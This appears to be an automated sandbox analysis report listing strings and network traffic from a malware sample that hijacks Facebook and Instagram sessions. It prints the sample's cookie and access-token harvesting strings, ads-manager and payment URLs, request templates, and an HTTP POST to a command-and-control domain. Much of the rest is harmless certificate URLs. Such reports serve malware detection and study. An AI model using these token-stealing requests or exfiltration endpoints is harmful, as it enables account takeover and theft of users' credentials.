1</span></span>+ https://m.facebook.com/pages/creation_flow/?step=name&cat_ref_page_id=0&ref_type=launch_point"dtsg":{"token":"accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9sec-fetch-dest: documentsec-fetch-mode: navigatesec-fetch-site: noneupgrade-insecure-requests: 1"https://m.facebook.com/pages/create/edit_name/"draftID":Accept: */*Origin: https://m.facebook.comReferer: https://m.facebook.com/pages/creation_flow/?step=name&cat_ref_page_id=0&ref_type=launch_pointSec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-originX-Requested-With: XMLHttpRequestX-Response-Format: JSONStreampage_name=&m_sess=&fb_dtsg=&jazoest=&__csr=&__req=3&__user=,"https://m.facebook.com/pages/creation_flow/?step=category&draft_id=&cat_ref_page_id=0&extra_data=%7B%22page_name%22%3A%22%22%7D"dtsg":{"token":"accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Referer: https://m.facebook.com/pages/creation_flow/?step=name&cat_ref_page_id=0&ref_type=launch_pointsec-fetch-dest: documentsec-fetch-mode: navigatesec-fetch-site: same-originSec-Fetch-User: ?1upgrade-insecure-requests: 1"https://m.facebook.com/pages/create/edit_category/"pageID":Referer: https://m.facebook.com/pages/creation_flow/?step=category&draft_id=&cat_ref_page_id=0&extra_data=%7B%22page_name%22%3A%22%22%7DAccept: */*Origin: https://m.facebook.comSec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-originX-Response-Format: JSONStreamX-Requested-With: XMLHttpRequestpage_category=1300&draft_id=&m_sess=&fb_dtsg=&jazoest=&__csr=&__req=9&__user=}"+ .-_@@friends2page.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: pageid = %s equals www.facebook.com (Facebook)
Source: 6852B33702F6B3BD.exe, 00000005.00000002.293226984.00000000036AC000.00000004.00000001.sdmpString found in binary or memory: bad allocationSOFTWARE\Mozilla\Mozilla FirefoxCurrentVersion\\MainInstall Directory%s\firefox.exe{}[]"1""2""3"123bad allocationc_user=xs=https://www.facebook.com/adsmanager/manage/adshttps://business.facebook.com/adsmanager/manage/adssettings/?act=&access_token:""access_token":""query_token_account_id.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: account_id = %s token =%s equals www.facebook.com (Facebook)
Source: 6852B33702F6B3BD.exe, 00000004.00000002.386927349.000000000346C000.00000004.00000001.sdmp, 6852B33702F6B3BD.exe, 00000005.00000002.293226984.00000000036AC000.00000004.00000001.sdmpString found in binary or memory: c_user=xs=https://www.facebook.com/ads/manager/account_settingsaccountID:"access_token:"Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: none""query_token_account_id_laomaozi.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: account_id = %s token =%s equals www.facebook.com (Facebook)
Source: 6852B33702F6B3BD.exe, 00000005.00000002.293226984.00000000036AC000.00000004.00000001.sdmpString found in binary or memory: c_user=xs=https://www.facebook.com/adsmanager/manage/adshttps://business.facebook.com/adsmanager/manage/adswindow.location.replace("")/act___accessToken="Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: nonehttps:act=/\/"%[0-9]query_token_account_id2.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: account_id = %s token =%s equals www.facebook.com (Facebook)
Source: 6852B33702F6B3BD.exeString found in binary or memory: http://www.youtube.com equals www.youtube.com (Youtube)
Source: 6852B33702F6B3BD.exe, 00000005.00000003.278156648.0000000003DDE000.00000004.00000001.sdmpString found in binary or memory: http://www.youtube.com//a equals www.youtube.com (Youtube)
Source: 6852B33702F6B3BD.exe, 00000005.00000003.278156648.0000000003DDE000.00000004.00000001.sdmpString found in binary or memory: http://www.youtube.comz/ equals www.youtube.com (Youtube)
Source: 6852B33702F6B3BD.exe, 00000004.00000002.386927349.000000000346C000.00000004.00000001.sdmp, 6852B33702F6B3BD.exe, 00000005.00000002.293226984.00000000036AC000.00000004.00000001.sdmpString found in binary or memory: https://www.facebook.com/ equals www.facebook.com (Facebook)
Source: 6852B33702F6B3BD.exe, 00000005.00000002.293226984.00000000036AC000.00000004.00000001.sdmpString found in binary or memory: https://www.facebook.com/"name="fb_dtsg" value=""logout_hash":"""logout_hash":"logoutToken:""logoutToken:"https://www.facebook.com/comet/try/source=SETTINGS_MENU&nctr[_mod]=pagelet_bluebar&__user=&__a=1&__csr=&__req=14&__beoa=0&__pc=PHASED%3ADEFAULT&dpr=1&__ccg=EXCELLENT&fb_dtsg=&jazoest=for (;;);{https://m.facebook.com/logout.php?h=%s&t=%sc_user=deleted"encrypted":"https://m.facebook.com/?_rdr""name="fb_dtsg" value="logout.phpm_sess=&fb_dtsg=&jazoest=&__csr=&__req=9&__a=&__user=https://m.facebook.com/bookmarks/flyout/body/?id=u_0_6\https://m.facebook.com/logout.php%sc_user=deletedhttps://m.facebook.com/?soft=bookmarks"logoutURL":"\"logout.phphttps://m.facebook.com&source=mtouch_logout_button&persist_locale=1&button_name=logout&button_location=settings%s equals www.facebook.com (Facebook)
Source: 6852B33702F6B3BD.exe, 00000004.00000002.386927349.000000000346C000.00000004.00000001.sdmp, 6852B33702F6B3BD.exe, 00000005.00000002.293226984.00000000036AC000.00000004.00000001.sdmpString found in binary or memory: https://www.facebook.com/ads/manager/account_settings equals www.facebook.com (Facebook)
Source: 6852B33702F6B3BD.exe, 00000004.00000002.386927349.000000000346C000.00000004.00000001.sdmp, 6852B33702F6B3BD.exe, 00000005.00000002.293226984.00000000036AC000.00000004.00000001.sdmpString found in binary or memory: https://www.facebook.com/adsmanager/manage/ads equals www.facebook.com (Facebook)
Source: 6852B33702F6B3BD.exe, 00000004.00000002.386927349.000000000346C000.00000004.00000001.sdmp, 6852B33702F6B3BD.exe, 00000005.00000002.293226984.00000000036AC000.00000004.00000001.sdmpString found in binary or memory: https://www.facebook.com/bookmarks/pages?ref_type=logout_gear equals www.facebook.com (Facebook)
Source: 6852B33702F6B3BD.exe, 00000004.00000002.386927349.000000000346C000.00000004.00000001.sdmp, 6852B33702F6B3BD.exe, 00000005.00000002.293226984.00000000036AC000.00000004.00000001.sdmpString found in binary or memory: https://www.facebook.com/comet/try/ equals www.facebook.com (Facebook)
Source: 6852B33702F6B3BD.exe, 00000005.00000002.293226984.00000000036AC000.00000004.00000001.sdmpString found in binary or memory: https://www.facebook.com/connect/ping?client_id=124024574287414&domain=www.instagram.com&origin=1&redirect_uri=https%3A%2F%2Fstaticxx.facebook.com%2Fconnect%2Fxd_arbiter%2Fr%2F1e2RywyANNe.js%3Fversion%3D42%23cb%3Df19f2d8a0dd2f24%26domain%3Dwww.instagram.com%26origin%3Dhttps%253A%252F%252Fwww.instagram.com%252Ff2dc055ae1b1274%26relation%3Dparent&response_type=token%2Csigned_request%2Ccode&sdk=joey&version=v2.2 equals www.facebook.com (Facebook)
Source: 6852B33702F6B3BD.exe, 00000005.00000002.293226984.00000000036AC000.00000004.00000001.sdmpString found in binary or memory: https://www.facebook.com/connect/ping?client_id=124024574287414&domain=www.instagram.com&origin=1&redirect_uri=https%3A%2F%2Fstaticxx.facebook.com%2Fconnect%2Fxd_arbiter%2Fr%2F1e2RywyANNe.js%3Fversion%3D42%23cb%3Df19f2d8a0dd2f24%26domain%3Dwww.instagram.com%26origin%3Dhttps%253A%252F%252Fwww.instagram.com%252Ff2dc055ae1b1274%26relation%3Dparent&response_type=token%2Csigned_request%2Ccode&sdk=joey&version=v2.2&access_token=&expires_in=Location: query_instagram_cookie.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: token = %s equals www.facebook.com (Facebook)
Source: 6852B33702F6B3BD.exe, 00000004.00000002.386927349.000000000346C000.00000004.00000001.sdmp, 6852B33702F6B3BD.exe, 00000005.00000002.293226984.00000000036AC000.00000004.00000001.sdmpString found in binary or memory: https://www.facebook.com/dialog/oauth?client_id=124024574287414&redirect_uri=https%3A%2F%2Fwww.instagram.com%2Faccounts%2Fsignup%2F&state=%7B%22fbLoginKey%22%3A%221l3a6gcoxzmx9bogry41n78unr193ooptzd1bmk8ggfxw5bdph1%22%2C%22fbLoginReturnURL%22%3A%22%2F%22%7D&scope=email&response_type=code%2Cgranted_scopes equals www.facebook.com (Facebook)
Source: 6852B33702F6B3BD.exe, 00000004.00000002.386927349.000000000346C000.00000004.00000001.sdmp, 6852B33702F6B3BD.exe, 00000005.00000002.293226984.00000000036AC000.00000004.00000001.sdmpString found in binary or memory: https://www.facebook.com/dialog/oauth?client_id=124024574287414&redirect_uri=https%3A%2F%2Fwww.instagram.com%2Faccounts%2Fsignup%2F&state=%7B%22fbLoginKey%22%3A%221l3a6gcoxzmx9bogry41n78unr193ooptzd1bmk8ggfxw5bdph1%22%2C%22fbLoginReturnURL%22%3A%22%2F%22%7D&scope=email&response_type=code%2Cgranted_scopesLocation: equals www.facebook.com (Facebook)
Source: 6852B33702F6B3BD.exe, 00000004.00000002.386927349.000000000346C000.00000004.00000001.sdmp, 6852B33702F6B3BD.exe, 00000005.00000002.293226984.00000000036AC000.00000004.00000001.sdmpString found in binary or memory: https://www.facebook.com/dialog/oauth?client_id=124024574287414&redirect_uri=https%3A%2F%2Fwww.instagram.com%2Faccounts%2Fsignup%2F&state=%7B%22fbLoginKey%22%3A%221l3a6gcoxzmx9bogry41n78unr193ooptzd1bmk8ggfxw5bdph1%22%2C%22fbLoginReturnURL%22%3A%22%2F%22%7D&scope=email&response_type=code%2Cgranted_scopesocation: equals www.facebook.com (Facebook)
Source: 6852B33702F6B3BD.exe, 00000004.00000002.386927349.000000000346C000.00000004.00000001.sdmp, 6852B33702F6B3BD.exe, 00000005.00000002.293226984.00000000036AC000.00000004.00000001.sdmpString found in binary or memory: https://www.facebook.com/login/async_sso/messenger_dot_com/?__a=1 equals www.facebook.com (Facebook)
Source: 6852B33702F6B3BD.exe, 00000004.00000002.386927349.000000000346C000.00000004.00000001.sdmp, 6852B33702F6B3BD.exe, 00000005.00000002.293226984.00000000036AC000.00000004.00000001.sdmpString found in binary or memory: https://www.facebook.com/login/async_sso/messenger_dot_com/?__a=1x-auth-result: query_mess_cookie.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: x_auth_result = %s equals www.facebook.com (Facebook)
Source: 6852B33702F6B3BD.exe, 00000004.00000002.386927349.000000000346C000.00000004.00000001.sdmp, 6852B33702F6B3BD.exe, 00000005.00000002.293226984.00000000036AC000.00000004.00000001.sdmpString found in binary or memory: https://www.facebook.com/payments/settings/payment_methods/index.php?__a=1 equals www.facebook.com (Facebook)
Source: 6852B33702F6B3BD.exe, 00000004.00000002.386927349.000000000346C000.00000004.00000001.sdmp, 6852B33702F6B3BD.exe, 00000005.00000002.293226984.00000000036AC000.00000004.00000001.sdmpString found in binary or memory: https://www.facebook.com/x/oauth/status?client_id=124024574287414&input_token&origin=1&redirect_uri= equals www.facebook.com (Facebook)
Source: 6852B33702F6B3BD.exe, 00000004.00000002.386927349.000000000346C000.00000004.00000001.sdmp, 6852B33702F6B3BD.exe, 00000005.00000002.293226984.00000000036AC000.00000004.00000001.sdmpString found in binary or memory: https://www.facebook.com/x/oauth/status?client_id=124024574287414&input_token&origin=1&redirect_uri=origin: https://www.instagram.comsec-fetch-mode: corsreferer: https://www.instagram.com/sec-fetch-site: cross-sitefb-ar: equals www.facebook.com (Facebook)
Source: 6852B33702F6B3BD.exe, 00000004.00000002.386927349.000000000346C000.00000004.00000001.sdmp, 6852B33702F6B3BD.exe, 00000005.00000002.293226984.00000000036AC000.00000004.00000001.sdmpString found in binary or memory: https://www.instagram.com/accounts/login/ajax/facebook/ equals www.facebook.com (Facebook)
Source: 6852B33702F6B3BD.exe, 00000004.00000002.386927349.000000000346C000.00000004.00000001.sdmp, 6852B33702F6B3BD.exe, 00000005.00000002.293226984.00000000036AC000.00000004.00000001.sdmpString found in binary or memory: x-csrftoken: xhttps://www.instagram.com/accounts/login/ajax/facebook/"userId": "sessionid="";sessionid=;query_instagram_cookie.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: sessionid = %s equals www.facebook.com (Facebook)
Source: 6852B33702F6B3BD.exe, 00000004.00000002.386927349.000000000346C000.00000004.00000001.sdmp, 6852B33702F6B3BD.exe, 00000005.00000002.293226984.00000000036AC000.00000004.00000001.sdmpString found in binary or memory: x-csrftoken: xhttps://www.instagram.com/accounts/login/ajax/facebook/"userId": "sessionid="";sessionid=;query_instagram_cookie_20191224.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: sessionid = %s equals www.facebook.com (Facebook)
Source: 6852B33702F6B3BD.exe, 00000004.00000002.386927349.000000000346C000.00000004.00000001.sdmp, 6852B33702F6B3BD.exe, 00000005.00000002.293226984.00000000036AC000.00000004.00000001.sdmpString found in binary or memory: x-csrftoken: xhttps://www.instagram.com/accounts/login/ajax/facebook/"userId": "sessionid="";sessionid=;query_instagram_cookie_20200229.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: sessionid = %s equals www.facebook.com (Facebook)
Source: unknownDNS traffic detected: queries for: 84cfba021a5a6662.xyz
Source: unknownHTTP traffic detected: POST //fine/send HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: application/x-www-form-urlencodedAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36upgrade-insecure-requests: 1Content-Length: 84Host: 84cfba021a5a6662.xyz
Source: 6852B33702F6B3BD.exe, 00000005.00000002.289422992.0000000000848000.00000004.00000020.sdmpString found in binary or memory: http://84CFBA021A5A6662.xyz/g
Source: 6852B33702F6B3BD.exe, 00000004.00000003.383740567.0000000003CA0000.00000004.00000001.sdmpString found in binary or memory: http://84CFBA021A5A6662.xyz/info_old/ddd
Source: 6852B33702F6B3BD.exe, 00000004.00000003.383740567.0000000003CA0000.00000004.00000001.sdmpString found in binary or memory: http://84CFBA021A5A6662.xyz/info_old/g
Source: 6852B33702F6B3BD.exe, 00000004.00000003.383740567.0000000003CA0000.00000004.00000001.sdmp, 6852B33702F6B3BD.exe, 00000005.00000002.289445112.0000000000865000.00000004.00000020.sdmpString found in binary or memory: http://84CFBA021A5A6662.xyz/info_old/w
Source: 6852B33702F6B3BD.exe, 00000005.00000002.289445112.0000000000865000.00000004.00000020.sdmpString found in binary or memory: http://84CFBA021A5A6662.xyz/info_old/w%
Source: FileSetup-v17.04.41.exe, 00000001.00000002.261142777.0000000000811000.00000004.00000020.sdmpString found in binary or memory: http://84CFBA021A5A6662.xyz/info_old/w&
Source: 6852B33702F6B3BD.exe, 00000005.00000002.289494170.0000000000893000.00000004.00000020.sdmpString found in binary or memory: http://84CFBA021A5A6662.xyz/info_old/wN
Source: 6852B33702F6B3BD.exe, 00000005.00000002.289422992.0000000000848000.00000004.00000020.sdmpString found in binary or memory: http://84CFBA021A5A6662.xyz/xet(
Source: FileSetup-v17.04.41.exe, 00000001.00000002.261158287.000000000081C000.00000004.00000020.sdmp, 6852B33702F6B3BD.exe, 00000005.00000002.289422992.0000000000848000.00000004.00000020.sdmpString found in binary or memory: http://84cfba021a5a6662.xyz/
Source: FileSetup-v17.04.41.exe, 00000001.00000002.261158287.000000000081C000.00000004.00000020.sdmpString found in binary or memory: http://84cfba021a5a6662.xyz/i
Source: FileSetup-v17.04.41.exe, 00000001.00000002.261142777.0000000000811000.00000004.00000020.sdmp, 6852B33702F6B3BD.exe, 00000005.00000002.289422992.0000000000848000.00000004.00000020.sdmpString found in binary or memory: http://84cfba021a5a6662.xyz/info_old/w
Source: 6852B33702F6B3BD.exe, 00000004.00000003.383694906.0000000003CBF000.00000004.00000001.sdmpString found in binary or memory: http://appldnld.apple.com/QuickTime/041-3089.20111026.Sxpr4/QuickTimeIns3)
Source: 6852B33702F6B3BD.exe, 00000004.00000003.305023752.0000000003CBF000.00000004.00000001.sdmpString found in binary or memory: http://appldnld.apple.com/QuickTime/041-3089.20111026.Sxpr4/QuickTimeInstaller.exe
Source: 6852B33702F6B3BD.exe, 00000004.00000003.305023752.0000000003CBF000.00000004.00000001.sdmpString found in binary or memory: http://appldnld.apple.com/QuickTime/041-3089.20111026.Sxpr4/QuickTimeInstaller.exe0)
Source: ecvAA35.tmp.11.drString found in binary or memory: http://cacerts.digicert.com/DigiCertECCSecureServerCA.crt0
Source: ecvAA35.tmp.11.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: 6852B33702F6B3BD.exe, 00000004.00000002.386927349.000000000346C000.00000004.00000001.sdmp, 6852B33702F6B3BD.exe, 00000005.00000002.293226984.00000000036AC000.00000004.00000001.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceCodeSigningCA-1.crt0
Source: 6852B33702F6B3BD.exe, 00000004.00000002.386927349.000000000346C000.00000004.00000001.sdmp, 6852B33702F6B3BD.exe, 00000005.00000002.293226984.00000000036AC000.00000004.00000001.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
Source: 6852B33702F6B3BD.exe, 00000004.00000002.386927349.000000000346C000.00000004.00000001.sdmp, 6852B33702F6B3BD.exe, 00000005.00000002.293226984.00000000036AC000.00000004.00000001.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2HighAssuranceCodeSigningCA.crt0
Source: ecvAA35.tmp.11.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2HighAssuranceServerCA.crt0
Source: ecvAA35.tmp.11.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2SecureServerCA.crt0
Source: ecvAA35.tmp.11.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSecureSiteECCCA-1.crt0
Source: 6852B33702F6B3BD.exe, 6852B33702F6B3BD.exe, 00000005.00000003.278156648.0000000003DDE000.00000004.00000001.sdmpString found in binary or memory: http://clients2.google.com/service/update2/crx
Source: 6852B33702F6B3BD.exe, 00000005.00000003.278156648.0000000003DDE000.00000004.00000001.sdmpString found in binary or memory: http://clients2.google.com/service/update2/crxE&
Source: FileSetup-v17.04.41.exeString found in binary or memory: http://config.i.duba.net/lminstall/%d.json?time=%d
Source: FileSetup-v17.04.41.exeString found in binary or memory: http://config.i.duba.net/lminstall/%d.json?time=%dcheckinstallSOFTWARE
Source: 1611946678493.exe.4.drString found in binary or memory: http://crl.comodoca.com/COMODOCodeSigningCA2.crl0r
Source: 1611946678493.exe.4.drString found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
Source: 1611946678493.exe.4.drString found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
Source: ecvAA35.tmp.11.drString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: ecvAA35.tmp.11.drString found in binary or memory: http://crl.pki.goog/GTS1O1core.crl0
Source: ecvAA35.tmp.11.drString found in binary or memory: http://crl.pki.goog/GTSGIAG3.crl0
Source: ecvAA35.tmp.11.drString found in binary or memory: http://crl.pki.goog/gsr2/gsr2.crl0?
Source: FileSetup-v17.04.41.exeString found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: ecvAA35.tmp.11.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: ecvAA35.tmp.11.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: ecvAA35.tmp.11.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: 6852B33702F6B3BD.exe, 00000004.00000002.386927349.000000000346C000.00000004.00000001.sdmp, 6852B33702F6B3BD.exe, 00000005.00000002.293226984.00000000036AC000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: 6852B33702F6B3BD.exe, 00000004.00000002.386927349.000000000346C000.00000004.00000001.sdmp, 6852B33702F6B3BD.exe, 00000005.00000002.293226984.00000000036AC000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0O
Source: ecvAA35.tmp.11.drString found in binary or memory: http://crl3.digicert.com/DigiCertSecureSiteECCCA-1.crl0
Source: ecvAA35.tmp.11.drString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
Source: ecvAA35.tmp.11.drString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0=
Source: 6852B33702F6B3BD.exe, 00000004.00000002.386927349.000000000346C000.00000004.00000001.sdmp, 6852B33702F6B3BD.exe, 00000005.00000002.293226984.00000000036AC000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/ha-cs-2011a.crl0.
Source: 6852B33702F6B3BD.exe, 00000004.00000002.386927349.000000000346C000.00000004.00000001.sdmp, 6852B33702F6B3BD.exe, 00000005.00000002.293226984.00000000036AC000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/sha2-ha-cs-g1.crl00
Source: ecvAA35.tmp.11.drString found in binary or memory: http://crl3.digicert.com/sha2-ha-server-g6.crl04
Source: ecvAA35.tmp.11.drString found in binary or memory: http://crl3.digicert.com/ssca-ecc-g1.crl0.
Source: ecvAA35.tmp.11.drString found in binary or memory: http://crl3.digicert.com/ssca-sha2-g6.crl0/
Source: ecvAA35.tmp.11.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl0=
Source: ecvAA35.tmp.11.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: 6852B33702F6B3BD.exe, 00000005.00000002.293226984.00000000036AC000.00000004.00000001.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: ecvAA35.tmp.11.drString found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0=
Source: ecvAA35.tmp.11.drString found in binary or memory: http://crl4.digicert.com/DigiCertSecureSiteECCCA-1.crl0L
Source: 6852B33702F6B3BD.exe, 00000004.00000002.386927349.000000000346C000.00000004.00000001.sdmp, 6852B33702F6B3BD.exe, 00000005.00000002.293226984.00000000036AC000.00000004.00000001.sdmpString found in binary or memory: http://crl4.digicert.com/ha-cs-2011a.crl0L
Source: 6852B33702F6B3BD.exe, 00000004.00000002.386927349.000000000346C000.00000004.00000001.sdmp, 6852B33702F6B3BD.exe, 00000005.00000002.293226984.00000000036AC000.00000004.00000001.sdmpString found in binary or memory: http://crl4.digicert.com/sha2-ha-cs-g1.crl0L
Source: ecvAA35.tmp.11.drString found in binary or memory: http://crl4.digicert.com/sha2-ha-server-g6.crl0L
Source: ecvAA35.tmp.11.drString found in binary or memory: http://crl4.digicert.com/ssca-ecc-g1.crl0L
Source: ecvAA35.tmp.11.drString found in binary or memory: http://crl4.digicert.com/ssca-sha2-g6.crl0L
Source: FileSetup-v17.04.41.exeString found in binary or memory: http://curl.haxx.se/docs/http-cookies.html
Source: FileSetup-v17.04.41.exeString found in binary or memory: http://curl.haxx.se/docs/http-cookies.html#
Source: 6852B33702F6B3BD.exeString found in binary or memory: http://docs.google.com/
Source: 6852B33702F6B3BD.exe, 00000004.00000003.383784768.0000000002227000.00000004.00000040.sdmpString found in binary or memory: http://download.divx.com/player/divxdotcom/DivXWebPlayerInstaller.exe
Source: 6852B33702F6B3BD.exeString found in binary or memory: http://drive.google.com/
Source: 6852B33702F6B3BD.exe, 00000004.00000003.304868433.0000000003CBF000.00000004.00000001.sdmpString found in binary or memory: http://forms.real.com/real/realone/download.html?type=rpsp_us
Source: ecvAA35.tmp.11.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAyuliQ?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: ecvAA35.tmp.11.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAzjSw3?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: ecvAA35.tmp.11.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB16g6qc?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=png
Source: ecvAA35.tmp.11.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17milU?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: ecvAA35.tmp.11.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB18T33l?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=j
Source: ecvAA35.tmp.11.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19x3nX?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
Source: ecvAA35.tmp.11.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19xCDZ?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
Source: ecvAA35.tmp.11.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19xGDT?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
Source: ecvAA35.tmp.11.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19xMWp?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
Source: ecvAA35.tmp.11.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19xaUu?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
Source: ecvAA35.tmp.11.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19xssM?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
Source: ecvAA35.tmp.11.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19xzm6?h=250&w=300&m=6&q=60&u=t&o=t&l=f&f=j
Source: ecvAA35.tmp.11.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19yF6n?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=j
Source: ecvAA35.tmp.11.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19yFoT?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
Source: ecvAA35.tmp.11.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19yuvA?h=250&w=300&m=6&q=60&u=t&o=t&l=f&f=j
Source: ecvAA35.tmp.11.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19yxVU?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
Source: ecvAA35.tmp.11.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB7hjL?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: ecvAA35.tmp.11.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBO5Geh?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: ecvAA35.tmp.11.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBPfCZL?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=png
Source: ecvAA35.tmp.11.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBVuddh?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: ecvAA35.tmp.11.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBX2afX?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=png
Source: ecvAA35.tmp.11.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBi9v6?m=6&o=true&u=true&n=true&w=30&h=30
Source: ecvAA35.tmp.11.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBnYSFZ?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: FileSetup-v17.04.41.exeString found in binary or memory: http://infoc0.duba.net/c/
Source: 1611946678493.exe.4.drString found in binary or memory: http://ocsp.comodoca.com0
Source: ecvAA35.tmp.11.drString found in binary or memory: http://ocsp.digicert.com0
Source: ecvAA35.tmp.11.drString found in binary or memory: http://ocsp.digicert.com0:
Source: ecvAA35.tmp.11.drString found in binary or memory: http://ocsp.digicert.com0B
Source: ecvAA35.tmp.11.drString found in binary or memory: http://ocsp.digicert.com0E
Source: ecvAA35.tmp.11.drString found in binary or memory: http://ocsp.digicert.com0F
Source: 6852B33702F6B3BD.exe, 00000004.00000002.386927349.000000000346C000.00000004.00000001.sdmp, 6852B33702F6B3BD.exe, 00000005.00000002.293226984.00000000036AC000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0I
Source: ecvAA35.tmp.11.drString found in binary or memory: http://ocsp.digicert.com0K
Source: ecvAA35.tmp.11.drString found in binary or memory: http://ocsp.digicert.com0M
Source: 6852B33702F6B3BD.exe, 00000004.00000002.386927349.000000000346C000.00000004.00000001.sdmp, 6852B33702F6B3BD.exe, 00000005.00000002.293226984.00000000036AC000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0P
Source: 6852B33702F6B3BD.exe, 00000004.00000002.386927349.000000000346C000.00000004.00000001.sdmp, 6852B33702F6B3BD.exe, 00000005.00000002.293226984.00000000036AC000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0R
Source: ecvAA35.tmp.11.drString found in binary or memory: http://ocsp.msocsp.com0
